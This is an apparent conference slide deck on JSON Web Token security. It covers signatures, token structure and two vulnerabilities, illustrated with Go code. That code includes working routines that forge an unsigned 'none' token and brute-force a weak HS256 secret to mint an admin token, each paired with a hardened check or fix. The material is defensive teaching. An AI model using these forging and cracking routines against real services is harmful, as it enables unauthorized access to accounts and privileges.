Slide 1

Demystifying JWT Pradheepa Pullanieswaran 18-DEC-2024

Slide 2

What is “Security”?

Slide 3

Boring !!!!

Slide 4

Scary !!!!

Slide 5

Complex !!!!

Slide 6

Today's Agenda ● Bore ● Scare ● Complicate

Slide 7

Today's Agenda ● JWT - What is it? ● Vulnerabilities

Slide 8

Me

Slide 9

Me
Pradheepa Pullanieswaran, Security Solution Architect, Mother of Twin Daughters
www.pradheepa.com

Slide 10

JWT

Slide 11

Passwords?

Slide 12

A Digital Identity

Slide 13

1. Should not be guessable
2. Numbers, special characters, length
3. Do not share
4. MFA

Slide 14

Asymmetric Algorithm

Slide 15

Public Key Private Key

Slide 16

Digitally signed with the private key; the message is verified using the public key

Slide 17

Signed Message - How does it ensure security?

Slide 18

1. Signer prepares the message [diagram: Signer, Verifier]

Slide 19

2. Signer creates the hash of the message

Slide 20

3. Signer encrypts the hash with the private key (this is the textbook RSA picture used on these slides; with ECDSA or EdDSA the private-key operation is not an encryption, but the flow is the same)

Slide 21

4. Signer adds the signature to the message

Slide 22

5. Verifier hashes the message

Slide 23

6. Verifier decrypts the signature with the public key, recovering the signer's hash

Slide 24

7. Verifier compares the two hashes; if they are equal, the signature verifies

Slide 25

8. What the signature guarantees: 1. The message has not been tampered with 2. The signer holds the private key
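The eight steps above, carried out in Go with RSA and SHA-256, as an added example that is not part of the slides. signMessage uses the standard library's PKCS#1 v1.5 signing (steps 2 to 4); verifyByHand performs steps 5 to 7 explicitly with big-integer arithmetic, so the "decrypt with the public key, then compare" picture is visible, including the padding and DigestInfo bytes that a real signature wraps around the hash; verifyWithLibrary is the call production code should make. The message text is constructed for the demo and the function names are mine.

```go
package main

import (
	"bytes"
	"crypto"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"fmt"
	"math/big"
)

// DER-encoded DigestInfo prefix for SHA-256 that PKCS#1 v1.5 places in front
// of the hash (RFC 8017, section 9.2).
var sha256DigestInfo = []byte{
	0x30, 0x31, 0x30, 0x0d, 0x06, 0x09, 0x60, 0x86, 0x48, 0x01, 0x65,
	0x03, 0x04, 0x02, 0x01, 0x05, 0x00, 0x04, 0x20,
}

// Steps 1 to 4: hash the message, then apply the private key to the padded
// hash. This private-key operation is the "encrypt the hash" on the slides.
func signMessage(priv *rsa.PrivateKey, msg []byte) ([]byte, error) {
	digest := sha256.Sum256(msg) // step 2
	return rsa.SignPKCS1v15(rand.Reader, priv, crypto.SHA256, digest[:])
}

// Steps 5 to 7 by hand: hash the message, apply the public key to the
// signature (s^e mod n, the "decrypt" on the slides) and compare the result
// with the expected padded encoding of our own hash.
func verifyByHand(pub *rsa.PublicKey, msg, sig []byte) bool {
	if len(sig) != pub.Size() {
		return false
	}
	digest := sha256.Sum256(msg) // step 5

	s := new(big.Int).SetBytes(sig)
	m := new(big.Int).Exp(s, big.NewInt(int64(pub.E)), pub.N) // step 6
	em := m.FillBytes(make([]byte, pub.Size()))

	// Expected EM: 0x00 0x01 FF..FF 0x00 DigestInfo || hash
	padLen := len(em) - 3 - len(sha256DigestInfo) - len(digest)
	expected := append([]byte{0x00, 0x01}, bytes.Repeat([]byte{0xff}, padLen)...)
	expected = append(expected, 0x00)
	expected = append(expected, sha256DigestInfo...)
	expected = append(expected, digest[:]...)
	return bytes.Equal(em, expected) // step 7
}

// verifyWithLibrary is the same check as verifyByHand, in constant time,
// and is what production code should call.
func verifyWithLibrary(pub *rsa.PublicKey, msg, sig []byte) bool {
	digest := sha256.Sum256(msg)
	return rsa.VerifyPKCS1v15(pub, crypto.SHA256, digest[:], sig) == nil
}

func main() {
	priv, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		panic(err)
	}
	msg := []byte("transfer 10 EUR to account 42") // constructed sample message
	sig, err := signMessage(priv, msg)
	if err != nil {
		panic(err)
	}
	fmt.Println("genuine message verifies: ", verifyByHand(&priv.PublicKey, msg, sig))
	tampered := []byte("transfer 10000 EUR to account 42")
	fmt.Println("tampered message verifies:", verifyByHand(&priv.PublicKey, tampered, sig))
}
```

Changing a single byte of the message changes the hash, so the recovered encoding no longer matches (guarantee 1); a signature produced under a different private key does not decrypt to a valid encoding under this public key (guarantee 2).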

Slide 26

JSON WEB TOKEN

Slide 27

JWT - When did you last use this?

Slide 28

OAuth OIDC

Slide 29

Provides access to the Application

Slide 30

JWT
● Widely adopted method for stateless authentication and secure data transmission, especially in the context of API authentication and single sign-on (SSO) systems.
● Popular with the rise of RESTful APIs and the need for decentralized authentication, particularly with frameworks like OAuth 2.0 and OpenID Connect.
● JWT's simplicity, flexibility, and ease of use have made it the de facto standard for token-based authentication in many modern web applications.

Slide 31

JWT Development Timeline
● 2010: The idea of JWT was conceived by Mike Jones. The need for a compact and secure way to transmit information between parties led to the creation of JWT as an alternative to earlier standards like SAML (Security Assertion Markup Language).
● 2011: The JWT format started to gain traction, and early discussions and drafts emerged, leading to the creation of libraries and tools that implemented it.
● 2015: JWT was officially standardized with the publication of RFC 7519 by the IETF Security Area. This RFC defines how JWTs should be structured, signed, and validated, making it a formal and interoperable standard.

Slide 32

JWT
● "JOT"/JSON WEB TOKEN (RFC 7519 suggests the pronunciation "jot")
● Base64url encoded (encoding, not encryption: anyone holding the token can decode the header and payload)
● Signed (a JWS)
● Optionally encrypted (a JWE); the signed tokens used as OAuth/OIDC access and ID tokens are usually not encrypted

Slide 33

Sample JWT
eyJhbGciOiAiSFMyNTYiLCAidHlwIjogIkpXVCJ9.eyJzdWIiOiAiMTIzNDU2Nzg5MCIsICJuYW1lIjogIkpvaG4gRG9lIiwgImlhdCI6IDE1MTYyMzkwMjJ9.eY0_1jsIu8FZp7Oo7Nq6fys13BcBQGR3hImy5Gh6uww

Slide 34

Header
eyJhbGciOiAiSFMyNTYiLCAidHlwIjogIkpXVCJ9.
{ "alg": "HS256", "typ": "JWT" }

Slide 35

Payload
eyJzdWIiOiAiMTIzNDU2Nzg5MCIsICJuYW1lIjogIkpvaG4gRG9lIiwgImlhdCI6IDE1MTYyMzkwMjJ9.
{ "sub": "1234567890", "name": "John Doe", "iat": 1516239022 }

Slide 36

Footer (the signature)
eY0_1jsIu8FZp7Oo7Nq6fys13BcBQGR3hImy5Gh6uww
Base64url-encoded signature over header.payload; for HS256 this is the HMAC-SHA256 under the shared secret. It is encoded, not encrypted.

Slide 37

JWT with HS256

Slide 38

Key Generator

Slide 39

JWT with RS256

Slide 40

JWT - Vulnerabilities


Slide 42

1. Token without Verification

Slide 43

JWT Valid Without Footer?

Slide 44

Unfortunately Yes

Slide 45

What is the significance of the Footer?

Slide 46

Remember this slide?? [diagram from slide 24: the Signer hashes the message and encrypts the hash with the private key; the Verifier hashes the message, decrypts the signature with the public key and checks that the two hashes are equal]

Slide 47

If you are not verifying, you are trusting
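The token structure from slides 33 to 37 and the "token without verification" failure from slides 42 to 47, in Go, as an added example that is not from the slides. decodeUnverified splits the sample token from slide 33 and reads its header and payload without ever looking at the footer, which is exactly what a decode-only service does; verifyHS256 is the verifying path: three segments, an exact alg check that also covers "none" in any capitalisation, and a constant-time comparison of the recomputed HMAC. The secret, the claims and the function names are mine; the secret behind the slide's own token is not on the slides, so that token is only decoded here.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"strings"
)

// Sample token from the slides; its secret is not given, so it is only decoded.
const slideToken = "eyJhbGciOiAiSFMyNTYiLCAidHlwIjogIkpXVCJ9.eyJzdWIiOiAiMTIzNDU2Nzg5MCIsICJuYW1lIjogIkpvaG4gRG9lIiwgImlhdCI6IDE1MTYyMzkwMjJ9.eY0_1jsIu8FZp7Oo7Nq6fys13BcBQGR3hImy5Gh6uww"

var b64 = base64.RawURLEncoding // JWT segments are base64url without padding

func decodeSegment(seg string, out *map[string]any) error {
	raw, err := b64.DecodeString(seg)
	if err != nil {
		return err
	}
	return json.Unmarshal(raw, out)
}

// hs256 computes the footer: HMAC-SHA256 over "header.payload", base64url-encoded.
func hs256(signingInput string, secret []byte) string {
	mac := hmac.New(sha256.New, secret)
	mac.Write([]byte(signingInput))
	return b64.EncodeToString(mac.Sum(nil))
}

// signHS256 mints a token from a claims map.
func signHS256(claims map[string]any, secret []byte) (string, error) {
	body, err := json.Marshal(claims)
	if err != nil {
		return "", err
	}
	header := b64.EncodeToString([]byte(`{"alg":"HS256","typ":"JWT"}`))
	signingInput := header + "." + b64.EncodeToString(body)
	return signingInput + "." + hs256(signingInput, secret), nil
}

// decodeUnverified is the anti-pattern: the footer is never examined, so
// whatever the client sent is trusted. Present only to make the failure visible.
func decodeUnverified(token string) (header, claims map[string]any, err error) {
	parts := strings.Split(token, ".")
	if len(parts) < 2 {
		return nil, nil, errors.New("malformed token")
	}
	if err = decodeSegment(parts[0], &header); err != nil {
		return nil, nil, err
	}
	if err = decodeSegment(parts[1], &claims); err != nil {
		return nil, nil, err
	}
	return header, claims, nil
}

// verifyHS256 is the hardened path: exactly three segments, alg must be
// exactly "HS256" (so "none", "None", "NONE" and any asymmetric alg are
// rejected before the key is used), and the footer is compared in constant time.
func verifyHS256(token string, secret []byte) (map[string]any, error) {
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return nil, errors.New("token must have header, payload and footer")
	}
	var header map[string]any
	if err := decodeSegment(parts[0], &header); err != nil {
		return nil, err
	}
	if alg, _ := header["alg"].(string); alg != "HS256" {
		return nil, fmt.Errorf("unsupported alg %q", alg)
	}
	expected := hs256(parts[0]+"."+parts[1], secret)
	if !hmac.Equal([]byte(expected), []byte(parts[2])) {
		return nil, errors.New("invalid signature")
	}
	var claims map[string]any
	if err := decodeSegment(parts[1], &claims); err != nil {
		return nil, err
	}
	return claims, nil
}

// noneToken forges a token with alg "none" and an empty footer, the shape a
// service that decodes without verifying accepts.
func noneToken(claims map[string]any) string {
	body, _ := json.Marshal(claims)
	return b64.EncodeToString([]byte(`{"alg":"none","typ":"JWT"}`)) + "." + b64.EncodeToString(body) + "."
}

func main() {
	secret := []byte("constructed-demo-secret-not-for-real-use")
	token, _ := signHS256(map[string]any{"sub": "1234567890", "role": "user"}, secret)
	claims, err := verifyHS256(token, secret)
	fmt.Println("genuine token, role:", claims["role"], err)
	forged := noneToken(map[string]any{"sub": "1234567890", "role": "admin"})
	_, trusted, _ := decodeUnverified(forged)
	fmt.Println("decode-only service sees role:", trusted["role"])
	_, err = verifyHS256(forged, secret)
	fmt.Println("verifying service says:", err)
}
```

Every acceptance decision in verifyHS256 happens before the claims are returned, so a caller cannot accidentally act on an unverified payload; the alg check is an equality test against the one algorithm this verifier expects, which is the simplest way to satisfy the "reject none case-insensitively" rule.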


Slide 49

2. Weak Secret


Slide 51

Prone to Brute-Force
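The weak-secret brute force from slides 49 to 51, in Go, as an added example that is not from the slides. An HS256 token carries everything an attacker needs offline: the signing input is public and each candidate secret costs one HMAC-SHA256, so a human-chosen secret falls to a wordlist. crackHS256 runs that attack, mintHS256 shows that the recovered secret lets the attacker issue any claims, and randomSecret is the fix. The wordlist, the weak secret "secret" and the claims are constructed for the demo; the function names are mine.

```go
package main

import (
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"fmt"
	"strings"
)

var b64 = base64.RawURLEncoding

// hs256 is the footer computation: HMAC-SHA256 over "header.payload".
func hs256(signingInput string, secret []byte) []byte {
	mac := hmac.New(sha256.New, secret)
	mac.Write([]byte(signingInput))
	return mac.Sum(nil)
}

// mintHS256 issues a token the way the target service does. Once the secret
// is known this is also the attacker's forging routine.
func mintHS256(payloadJSON string, secret []byte) string {
	header := b64.EncodeToString([]byte(`{"alg":"HS256","typ":"JWT"}`))
	signingInput := header + "." + b64.EncodeToString([]byte(payloadJSON))
	return signingInput + "." + b64.EncodeToString(hs256(signingInput, secret))
}

// crackHS256 is the offline attack: recompute the footer under each candidate
// secret and stop when it matches. No request ever reaches the service, so
// rate limiting and lockouts do not help.
func crackHS256(token string, wordlist []string) (secret string, found bool) {
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return "", false
	}
	want, err := b64.DecodeString(parts[2])
	if err != nil {
		return "", false
	}
	signingInput := parts[0] + "." + parts[1]
	for _, candidate := range wordlist {
		if hmac.Equal(hs256(signingInput, []byte(candidate)), want) {
			return candidate, true
		}
	}
	return "", false
}

// randomSecret is the fix: at least 32 random bytes (the HMAC-SHA256 output
// size, which RFC 7518 sets as the minimum key size for HS256), never a word.
func randomSecret() ([]byte, error) {
	secret := make([]byte, 32)
	if _, err := rand.Read(secret); err != nil {
		return nil, err
	}
	return secret, nil
}

// Constructed wordlist. A real attack uses a list with millions of entries
// (or hashcat mode 16500, JWT) against the same HMAC computation.
var wordlist = []string{"password", "123456", "qwerty", "letmein", "secret", "changeme"}

func main() {
	// A service that signs with the word "secret" (constructed weak secret).
	token := mintHS256(`{"sub":"1234567890","role":"user"}`, []byte("secret"))
	if secret, ok := crackHS256(token, wordlist); ok {
		forged := mintHS256(`{"sub":"1234567890","role":"admin"}`, []byte(secret))
		fmt.Printf("recovered secret %q\nforged token: %s\n", secret, forged)
	}
	strong, err := randomSecret()
	if err != nil {
		panic(err)
	}
	_, ok := crackHS256(mintHS256(`{"sub":"1234567890"}`, strong), wordlist)
	fmt.Println("random 32-byte secret cracked by wordlist:", ok)
}
```

The verifier-side code is identical for the weak and the strong secret; the only thing that changes is whether the secret is in any list an attacker can enumerate, which is why HS256 keys must be generated, not chosen.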

Slide 52

Key Takeaways

Slide 53

Choose the proper signature algorithm
➔ HMACs are only useful internally in an application, where the issuer and the verifier can share one secret
➔ All other scenarios should rely on asymmetric signatures (for example RS256 or ES256), so verifiers hold only the public key
Follow JWT security recommendations
➔ Explicitly type your JWT (set and check the typ header)
➔ Use strong signature algorithms
➔ Use the registered claims (exp, nbf, iss, aud, sub) with their standard meaning, and validate them
Explicitly verify the security of the backend application
➔ Libraries should be actively supported and up to date
➔ JWTs with "none" signatures should be rejected case-insensitively
➔ JWTs with invalid signatures should be rejected

Slide 54

Any Questions?

Slide 55

Thank You

Slide 56

References
https://owasp.org/www-chapter-belgium/assets/2021/2021-02-18/JWT-Security.pdf
https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/
https://8gwifi.org/jwsgen.jsp